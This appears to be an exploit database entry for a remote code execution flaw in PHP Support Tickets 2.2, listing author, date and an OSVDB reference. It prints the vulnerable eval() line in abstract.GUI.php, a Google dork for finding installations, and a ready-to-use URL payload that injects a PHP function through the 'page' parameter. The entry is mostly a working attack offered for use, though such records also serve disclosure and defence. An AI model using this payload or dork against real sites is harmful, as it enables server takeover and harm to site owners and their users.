[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP Support Tickets 2.2 - Code Execution

Author: brain[pillow]
type: webapps
platform: php
port: 
date_added: 2011-09-12 
date_updated: 2011-09-12 
verified: 0 
codes: OSVDB-86075 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: PHP Support Tickets v2.2 Code Exec
# Google Dork: "PHP Support Tickets v2.2"
# Date: 26.09.2010
# Author: brain[pillow]
# Software Link: http://www.phpsupporttickets.com/
# Version: 2.2

====================================================================
# Vuln. code:

/classes/GUI/abstract.GUI.php

    public function getPageName() {
        return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';');
    }

====================================================================
# Exploit:

/index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.